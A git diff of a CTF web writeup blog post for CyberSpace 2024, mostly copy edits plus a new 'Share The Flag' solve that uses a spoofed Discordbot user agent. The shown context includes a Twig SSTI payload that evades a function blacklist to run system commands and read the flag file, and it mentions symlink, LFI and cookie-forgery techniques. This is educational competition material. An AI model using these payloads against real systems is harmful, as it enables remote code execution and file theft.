PSDat123
diff --git a/‎_posts/2024-09-02-Cyberspace-2024.md‎
Lines changed: 63 additions & 25 deletions b/‎_posts/2024-09-02-Cyberspace-2024.md‎
Lines changed: 63 additions & 25 deletions
diff --git a/‎assets/img/CyberSpace-2024/share-the-flag-flag.png‎
498 KB b/‎assets/img/CyberSpace-2024/share-the-flag-flag.png‎
498 KB
diff --git a/‎assets/img/CyberSpace-2024/share-the-flag-user-agent.png‎
63.6 KB b/‎assets/img/CyberSpace-2024/share-the-flag-user-agent.png‎
63.6 KB
diff --git a/‎assets/img/CyberSpace-2024/share-the-flag.png‎
106 KB b/‎assets/img/CyberSpace-2024/share-the-flag.png‎
106 KB
@@ -1,17 +1,17 @@
 ---
 title: CyberSpace CTF 2024 - WEB
-date: 2024-09-03 12:03 +0700
+date: 2024-09-03 20:03 +0700
 tags: [ctf, web]
 categories: [CTF Writeups]
 author: Dat2Phit
 img_path: /assets/img/CyberSpace-2024
 image: banner.png
 ---
 
-I played [CyberSpace 2024](https://ctftime.org/event/2428) this year with the team [epic merger](https://ctftime.org/team/349896) and got 5th place. We cleared the web category. Here's the writeups for the challenges that I've solve and my note on my teammate's solution for the challenges that I wasn't able to solve.
+I played [CyberSpace 2024](https://ctftime.org/event/2428) this year with the team [epic merger](https://ctftime.org/team/349896) and got 5th place. We cleared the web category (including the sponsor challenge). Here's the writeups for the challenges that I've solve and my note on my teammate's solution for the challenges that I wasn't able to solve.
 
 ## ZipZone
-**Solver:** 173 <br>
+**Solvers:** 173 <br>
 **Author:** rex
 
 This was a beginner web challenge, the idea was to use the fact that we can zip a [symlink](https://en.wikipedia.org/wiki/Symbolic_link) and when upzipped, we can read that symlink which can point to any files on the system
@@ -65,7 +65,7 @@ After that just upload the symlink.zip to the site and read the flag.
 **Flag:** `CSCTF{5yml1nk5_4r3_w31rd}`
 
 ## Feature Unlocked
-**Solver:** 184 <br>
+**Solvers:** 184 <br>
 **Author:** cryptocat
 
 When reading the source we can see that we need to exploit a command injection at the endpoint `/feature`
@@ -238,7 +238,7 @@ print(res.text)
 **Flag:** `CSCTF{d1d_y0u_71m3_7r4v3l_f0r_7h15_fl46?!}`
 
 ## Trendzz
-**Solver:** 86 <br>
+**Solvers:** 86 <br>
 **Author:** careless_finch
 
 3-part (4-part actually) web challenge written in golang.
@@ -333,7 +333,7 @@ It takes a couple tries but eventually it will spit out the flag
 **Flag:** `CSCTF{d2426fb5-a93a-4cf2-b353-eac8e0e9cf94}`
 
 ## Trendzzz
-**Solver:** 37 <br>
+**Solvers:** 37 <br>
 **Author:** careless_finch
 
 I solved this one before [`Trendz`](#trendz) because I wasn't able to find the intended solution and solved it the unintended way, but eventually I did find the intended solution when trying to find the binary for the fourth chall (Trendzzzz which is a rev challenge).
@@ -400,7 +400,7 @@ print(res.text)
 **Flag:** `CSCTF{759b2187-f746-49e1-90da-2b645d3cd61c}`
 
 ## Trendz
-**Solver:** 52 <br>
+**Solvers:** 52 <br>
 **Author:** careless_finch
 
 ### Unintended
@@ -460,7 +460,7 @@ Yep it was there all along, we can do path traversal to get the challenge binary
 To solve the first challenge, we just need to craft a admin session token with the `jwt.secret` and go to `/admin/dashboard` to get the secret post id and get the flag.
 
 ## notekeeper
-**Solver:** 19 <br>
+**Solvers:** 19 <br>
 **Author:** 0xM4hm0ud
 
 This challenge had me shoveling a lot because of the `X-Forwarded-For` header. The idea of the challenge was to spoof our ip to access the `/admin` route of the app which can be exploited with LFI, after that we need to find a way to login as `admin` and read the flag.
@@ -560,7 +560,7 @@ To get the flag, just go to `/flag` as with the admin cookie we just crafted and
 **Flag:** `CSCTF{Y0u_G0t_1t_G00d_J0b}`
 
 ## Snippets
-**Solver:** 11 <br>
+**Solvers:** 11 <br>
 **Author:** bawolff
 
 ### Unintended
@@ -682,15 +682,15 @@ The browser will just "merge" the two sets of `script` tags together. Which resu
 ...
 <input type="text" value="--></script>
 ```
-Even the syntax highlighting doesn't know what's going on lol. The script that's actually ran is this
+Even the syntax highlighter doesn't know what's going on lol. The script that's actually ran is this
 ```javascript
 	console.log("<!--<script>");
 </script>
 ...
 <input type="text" value="-->
 ```
-Which is invalid javascript and will throw an error. But we can workaround it with some clever techniques as seen in the article.
-In the case of this challenge, if we input the author's payload, we'll get something like:
+Which is invalid javascript and will throw an error. But we can work around it with some clever tricks as seen in the article.
+In the case of this challenge, if we put in the author's payload, we'll get something like:
 ```html
 <!DOCTYPE html>
 <html>
@@ -740,7 +740,7 @@ Then pop goes the alert.
 ## Teammate's solves
 
 ### Quiz
-**Solver:** 9 <br>
+**Solvers:** 9 <br>
 **Author:** GabeG888
 
 This challenge was solved by [Masamune](https://discord.com/users/538608747153588224) after one of our teammmates gave an idea
@@ -842,10 +842,10 @@ while True:
 **Flag:** `CSCTF{3rr0r5_c4n_b3_0r4c135}`
 
 ### Twig Playground
-**Solver:** 7 <br>
+**Solvers:** 7 <br>
 **Author:** 0xM4hm0ud
 
-This challenge was solved by [jeser](https://discord.com/users/293440719857909760) while I was asleep, when I woke up and saw his payload, I was overwhelmed lol. But here's my analysis of the challenge.
+This challenge was solved by [jeser](https://discord.com/users/293440719857909760) while I was sleeping, when I woke up and saw his payload, I was overwhelmed lol. But here's my analysis of the challenge.
 
 Here's his final payload for the challenge:
 ```
@@ -861,8 +861,8 @@ Here's his final payload for the challenge:
 {{ {rce}|find(syste~m) }}{% endraw %}
 ```
 
-Let's analyze the problem before going into the payload
-This is a Twig SSTI challenge, our goal is to bypass the blacklist and achieve RCE
+Let's analyze the problem before going into the payload.
+This is a Twig SSTI challenge, our goal is to bypass the blacklist and achieve RCE.
 ```php
 $blacklist = ['system', 'id', 'passthru', 'exec', 'shell_exec', 'popen', 'proc_open', 'pcntl_exec', '_self', 'reduce', 'env', 'sort', 'map', 'filter', 'replace', 'encoding', 'include', 'file', 'run', 'Closure', 'Callable', 'Process', 'Symfony', '\'', '"', '.', ';', '[', ']', '\\', '/', '-'];
 ```
@@ -889,25 +889,25 @@ So we got ` ` and `/` now, let's assign them to a variable first.
 Next we need to find a way to get `system`.
 To get system, we can actually do the same as ` ` and `/` but it'll be to tedious. Instead, we can do something like this: `{syste:1}|keys|join()`. The `keys` filter will extract all the keys in an object and put it into an array, in this case, we'll get `syste`.
 
-For the character `m` we can do this `{m:1}|keys|join()`
+For the character `m` we can do this `{m:1}|keys|join()`.
 
-In order to join them together, Twig has a very convenient operator which is `~` that is not in the blacklist
+In order to join them together, Twig has a very convenient operator which is `~` that is not in the blacklist.
 
 ![twig tilde doc](twig-tilde.png)
 *Reference: [https://www.branchcms.com/learn/docs/developer/twig/operators](https://www.branchcms.com/learn/docs/developer/twig/operators)*
 
-Let's set those two as a variable first
+Let's set those two as a variable first.
 ```
 {% raw %}{% set syste={syste:1}|keys|join() %}
 {% set m={m:1}|keys|join() %}{% endraw %}
 ```
-So we can do something like this `syste~m` which will return the string `system`
+So we can do something like this `syste~m` which will return the string `system`.
 Oh and make sure to set `ls` as a variable too so we can chain them together.
 ```
 {% raw %}{% set ls={ls:1}|keys|join() %}
 {% set rce=ls~space~slash %}{% endraw %}
 ```
-`ls~space~slash` will result in `ls /`
+`ls~space~slash` will result in `ls /`.
 
 So now how to execute it? We only got the string `system` and `ls`.
 
@@ -929,8 +929,7 @@ Sending it to server will give this output
 ```
 bin dev etc flag-edbfcbcaef home lib media mnt opt proc root run sbin srv sys tmp usr var ls /
 ```
-Now we know that the flag file name is `flag-edbfcbcaef`
-So we'll use the same technique to execute <br>
+Now we know that the flag file name is `flag-edbfcbcaef`. So we'll use the same technique to execute <br>
 `cat /flag-edbfcbcaef`
 
 But there's a new character which we can't use the above technique for, it's the dash character `-`.
@@ -949,7 +948,7 @@ The other strings `cat`, `flag` and `edbfcbcaef` can be constructed using the go
 {% set flag2={edbfcbcaef:1}|keys|join() %}
 {% set rce=cat~space~slash~flag1~dash~flag2 %}{% endraw %}
 ```
-`cat~space~slash~flag1~dash~flag2` will result in `cat /flag-edbfcbcaef` 
+`cat~space~slash~flag1~dash~flag2` will result in `cat /flag-edbfcbcaef`.
 
 All that's left is to chain them together to get the final payload, send them to the server and get the flag.
 
@@ -967,4 +966,43 @@ All that's left is to chain them together to get the final payload, send them to
 ```
 **Flag:** `CSCTF{Tw1g_tw1g_ssT1_n0_h4cKtr1ck5_th1S_t1M3}`
 
+### Share The Flag
+**Solvers:** 6 <br>
+**Author:** Cybersharing
+
+This challenge was solved by [LyC0nTriX](https://discord.com/users/1116855799659102309) in the last 5 minutes of the competition. This was more of a misc-guessing challenge more than a web challenge but it has a web tag so I'll include it here as well.
+
+The challenge gave us a picture with the following hints
+![Challenge picture](share-the-flag.png)
+
+> Hint: There are 2 important pieces of information that one can get from the discord screenshot. One is the fact that the mention of a VPN, hints to the IP History page.
+
+> Hint 2: Think about how discord knows to display such a good looking embed and the technology used in the site.
+
+Hint 1 told us to go to the IP History page but we can't find anything useful there after a while.
+
+According the hint 2, it's related to how discord fetch the embed and display it. So I think if we can replicate what discord does to get the embed, we'll get the flag.
+
+So I'll spin up a quick http server that can log headers information and send the server address to a random channel. This is what I receive after that.
+
+![headers info](share-the-flag-user-agent.png)
+
+As you can see, discord will send a request to that address with the user-agent: `Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)`.
+
+So let's try to request `cybersharing.net` ourselves with that header and see what will be returned.
+We'll send a curl request with the header `User-Agent: Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)` to [https://cybersharing.net/history](https://cybersharing.net/history) since the first hint pointed to that.
+
+```console
+curl -H 'User-Agent: Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)' https://cybersharing.net/history
+```
+It'll return a bunch of html code, but if we look closely or use `grep` we can see that's there's a link to the flag file.
+
+![flag link](share-the-flag-flag.png)
+
+Here's the link: [https://cybersharing.net/s/13f17b167f2229809a95fb9d8c725449](https://cybersharing.net/s/13f17b167f2229809a95fb9d8c725449) 
+
+Download it and get the flag.
+
+**Flag:** `CSCTF{dd4a22b47251fd92207cc057c37728a2}`
+
 *That's all folks, thank you all for such an amazing CTF event.*